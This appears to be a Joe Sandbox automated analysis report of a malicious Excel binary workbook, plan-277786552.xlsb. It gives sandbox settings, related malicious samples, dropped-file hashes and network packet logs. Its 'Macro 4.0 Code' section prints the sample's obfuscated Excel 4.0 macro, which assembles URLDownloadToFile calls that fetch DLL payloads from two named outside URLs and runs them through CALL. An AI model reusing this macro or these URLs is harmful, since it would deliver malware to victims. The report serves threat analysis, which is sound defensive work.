                                                                                                                                                Overall analysis duration:0h 5m 32s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:plan-277786552.xlsb
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:29
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal84.expl.evad.winXLSB@5/4@2/1
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsb
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Max analysis timeout: 220s exceeded, the analysis took too long
                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 104.43.193.48, 40.88.32.150, 52.109.88.177, 52.109.8.23, 52.109.8.25, 13.88.21.125, 20.49.157.6, 23.35.236.56, 67.26.73.254, 8.241.78.126, 8.238.30.254, 8.238.85.126, 8.253.207.121, 20.54.7.98, 40.112.88.60, 80.67.82.235, 80.67.82.211, 13.107.5.88, 13.107.42.23, 20.82.210.154
                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, l-0014.config.skype.com, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, config.edge.skype.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, l-0014.l-msedge.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                UNIFIEDLAYER-AS-1USOrder.exeGet hashmaliciousBrowse
                                                                                                                                                • 108.167.183.94
                                                                                                                                                0rder-bcm_23062021.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.87.249.240
                                                                                                                                                wdxYcFUCJV.exeGet hashmaliciousBrowse
                                                                                                                                                • 74.220.199.6
                                                                                                                                                Inv 820984.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 162.144.12.168
                                                                                                                                                N0vpYgIYpv.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.241.216.218
                                                                                                                                                droxoUY6SU.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.185.25
                                                                                                                                                idea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 108.167.165.249
                                                                                                                                                idea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 108.167.165.249
                                                                                                                                                Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.241.60.126
                                                                                                                                                WXs8v9QuE7.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.87.146.99
                                                                                                                                                tender-1235416393.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 192.185.88.195
                                                                                                                                                tender-1235416393.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 192.185.88.195
                                                                                                                                                Order.exeGet hashmaliciousBrowse
                                                                                                                                                • 108.167.183.94
                                                                                                                                                Habib_Bank Payment Advice.doc__.rtfGet hashmaliciousBrowse
                                                                                                                                                • 162.144.79.7
                                                                                                                                                heoN5wnP2d.exeGet hashmaliciousBrowse
                                                                                                                                                • 74.220.199.8
                                                                                                                                                FidKy67SWO.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.254.185.252
                                                                                                                                                RFQ-BCM 03122020.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.87.249.240
                                                                                                                                                plan-1637276620.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 192.185.21.116
                                                                                                                                                idea-1232922316.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 162.241.194.107
                                                                                                                                                Orden de compra.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.0.218

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                instagrampassword_setup.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                bmaphis@cardinaltek.com_16465506 AMDocAtt.HTMLGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                twd.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                0ZQNzv3MyU.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                USD 12,371.35 SWIFT report.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                PAYMENT COPY.pptGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                20210621_064143.htmlGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                Wire Info.docxGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                Nueva orden de env#U00edo .exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                Global _Transport NZ..xlsxGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                ghXWqV6o1J.docxGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                idea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                OzygoxrbzzvtmyjupcpndcovpjxtqpiywjSigned.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                2t71031BUz.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                DmtxjmmsiwawliehhrzxcpwdxtexpegwgoSigned.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                tender-1235416393.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                Payment Ref 24,845.docxGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                3yBar59k6g.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246
                                                                                                                                                rVkZUqVZ40.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.92.246

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\5BE7D80B-BB37-4BDA-B35D-5B3F7A73C206
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):134914
                                                                                                                                                Entropy (8bit):5.367833155181977
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ecQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:KEQ9DQW+zvXO1
                                                                                                                                                MD5:C4D761BF1A56A083F277A1150EF05D9C
                                                                                                                                                SHA1:AD44052E997E92F86B56D894CFAE334EF0B681DC
                                                                                                                                                SHA-256:8612616C102A5B84C2DDD60E5B3BC3F214FE74CCE6984E6372B6315F37D5B540
                                                                                                                                                SHA-512:F4524498E75321F646BA8E3A01CF27373FD2C0BB0629BCA1E9EC7DC1D12D8B1DB3E9C5980F31F207D6209C5C56A2466D82422E2C6CDB6B98EDE236B70F481A6B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-23T16:06:37">.. Build: 16.0.14221.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\75F7EE28.png
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:PNG image data, 1133 x 589, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75711
                                                                                                                                                Entropy (8bit):7.915372969602997
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:gxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncT:7br0o45GUgHhX8jC9yST
                                                                                                                                                MD5:8296338A43942E3107802E3062AC1270
                                                                                                                                                SHA1:46E67A586ED8A961AF7FD03140547C1CB2BAC227
                                                                                                                                                SHA-256:BE5F61F2AE8E4C9F9ADBCE5EC33D4C01A331734FFC5818AA8E45CF60456C5ABD
                                                                                                                                                SHA-512:C2179050A009C990CBFE6EA45E44AA6307AAC938E3EA523D31713F657E09131B07ACEBB31FC353C5A23E7D6323C4EC01736CFF092ACA1D49B58E71A07F1171AD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .PNG........IHDR...m...M......p......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^......g......q.|.....<...'r....-^..c.If.,ffX1K.[....Z....V.LO5L..J+...z.]]u..>.==.......................Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t......j.7ZP...:...0S....z5T........).WU=j.*.$H.B.P.)l.6Q..'.l..7..k..J.o..._....6..{C...r.|2W.[a...m.BI.?...5......D....4;B...@b.HiP.jfj}@.S9..E.*J...O..BA5.e:...q!.SP....w....(..._.,..I.|a.7+>.........A#......3v..37......w(..j...C.R..H3.f.Q....0....h~...)aM..).vQ.1..+J@Q.....Oa+...!5.e.b...V..|..d../.......vC..&..=9...n.....^6-.tRj...O..{j.e.N....o..~..^.......#!...T...C.#.>.E,[.,......E....h~B.Y./....(2.......(...`....~w#.%..R..{........N.Z....k]8>..dW..^s....U...9...W.e...]...W...i.{u.>.s.,L.>1..)....f..b..Z.nai$.Q.."...W2.......Q...G...z....Ea......
                                                                                                                                                C:\Users\user\AppData\Local\Temp\0E810000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):113222
                                                                                                                                                Entropy (8bit):7.875705327761934
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:PKYUOtOpEknvGrnxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncVv:PKY45br0o45GUgHhX8jC9ySVv
                                                                                                                                                MD5:8C848255DE789AD5D1608009EEE15D33
                                                                                                                                                SHA1:08A3F58BE98F761E7D5DFC32B696883C2A73BCE8
                                                                                                                                                SHA-256:A4A401D633D6F597AB78A8BA222FAAEC0AC20C59C650FBC4B79ED9E4ACE2E213
                                                                                                                                                SHA-512:E71608790254695154B31E942E4DCD97F54BB885971E9DB7F833635C2686830858611BE3D1B8922750411512D0FF7D1A34854329448D5695DCEC4067614807DF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: ...N.1....x...h.EUU..h. .>..>.X.M>....3....U......./....#&2.........U/~..h...2x.6x...I\-.>....a..^.9.R....u!..eH.2......By9.}.*..>..x...;.....z..;..W....W.za\.vyP......h...s..^..jG...u..&.9..#...fz.0.nx1....B.?.1..X....>.uw.P:jq..v4 ..J...E.....$U%...xG...k.ri....oSG1!.j.lWfR.'8*..b|.......L.e>z(....W..@.[.....3.J. .................?N_...X.....".%...W....l.)..W....'r....X.8..@..W..........PK..........!.j.9.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H......
                                                                                                                                                C:\Users\user\Desktop\~$plan-277786552.xlsb
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):165
                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                Entropy (8bit):7.83635013932937
                                                                                                                                                TrID:
                                                                                                                                                • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                File name:plan-277786552.xlsb
                                                                                                                                                File size:90078
                                                                                                                                                MD5:1ab505496be60c9ec06e78052d5cf557
                                                                                                                                                SHA1:2a2602511286c90591824cf91b1027f20e537212
                                                                                                                                                SHA256:af9ed7ee18c789857f7356314109cf0635f6905afc9a6ad74f8742c78d46b446
                                                                                                                                                SHA512:6f8358e59793837918765d183e28a4d4cc5afd4cc9c216bb1e91b6288f523b478505f5e8532d924c379742956ebc185f8e22464cd5efdbf685773e9c9076fc79
                                                                                                                                                SSDEEP:1536:KlHoxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncjv0/Ci:KDbr0o45GUgHhX8jC9ySa
                                                                                                                                                File Content Preview:PK..........!..#..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OpenXML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "plan-277786552.xlsb"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:
                                                                                                                                                Application Name:
                                                                                                                                                Encrypted Document:
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:

                                                                                                                                                Macro 4.0 Code

                                                                                                                                                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\gihi1.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\gihi2.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""https://carpascapital.com/gBPg8MtsGbv/ka.html""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""https://gruasphenbogota.com/C74hwGGxi/ka.html""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,URLDow,CC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nload,BB,,"=FORMULA(before.2.0.0.sheet!BG27&before.2.0.0.sheet!BG28&before.2.0.0.sheet!BG29,before.2.0.0.sheet!BL47)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,To,,,"=FORMULA(before.2.0.0.sheet!BG11&before.2.0.0.sheet!BG12&before.2.0.0.sheet!BG13&before.2.0.0.sheet!BG14&before.2.0.0.sheet!BG15,before.2.0.0.sheet!BL48)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""rsthYFGIPUYiugeA"",2)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,"=FORMULA.ARRAY(BH10&BH11&BH12,before.2.0.0.sheet!BL49)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CALL,,"=FORMULA.ARRAY(BG33&BG34&BG35&BG36&BG37&BG38&BG39&""2 "",before.2.0.0.sheet!BO52)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA(BH19&BH20&BH33&before.2.0.0.sheet!BL47&BH34&BH37&BH34&before.2.0.0.sheet!BL48&BH34&BH37&BH34&before.2.0.0.sheet!BL49&BH34&BH37&BH39&BH37&BH34&BG5&BH34&BH37&BH34&BG2&BH34&BH37&BH39&BH37&BH39&BH36,before.2.0.0.sheet!BJ47)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,URL,,,"=FORMULA(BH19&BH20&BH33&before.2.0.0.sheet!BL47&BH34&BH37&BH34&before.2.0.0.sheet!BL48&BH34&BH37&BH34&before.2.0.0.sheet!BL49&BH34&BH37&BH39&BH37&BH34&BG6&BH34&BH37&BH34&BG3&BH34&BH37&BH39&BH37&BH39&BH36,before.2.0.0.sheet!BJ48)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA(BI32&BI33&BI34&BI35,BL50)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",E,"=FORMULA(BG19&BL50&before.2.0.0.sheet!BO52&before.2.0.0.sheet!BG2&before.2.0.0.sheet!BH32,before.2.0.0.sheet!BJ49)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""","(""",X,"=FORMULA(BG19&BL50&before.2.0.0.sheet!BO52&before.2.0.0.sheet!BG3&before.2.0.0.sheet!BH32,before.2.0.0.sheet!BJ50)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,"""",E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,&,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,g,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                Network Behavior

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Jun 23, 2021 18:06:39.895704031 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.054238081 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.054358006 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.055752039 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.210494041 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.213632107 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.213651896 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.213666916 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.213681936 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.213721991 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.213756084 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.216695070 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.216759920 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.231791019 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.388053894 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.388159990 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.389183998 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.588035107 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.793217897 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.793322086 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.793946981 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.794017076 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:40.869447947 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.031188965 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.031344891 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.032063961 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.193501949 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.193924904 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.193958998 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.193975925 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.193988085 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.194011927 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.194041014 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.195301056 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.195394993 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.203769922 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.369333982 CEST4434972050.116.92.246192.168.2.3
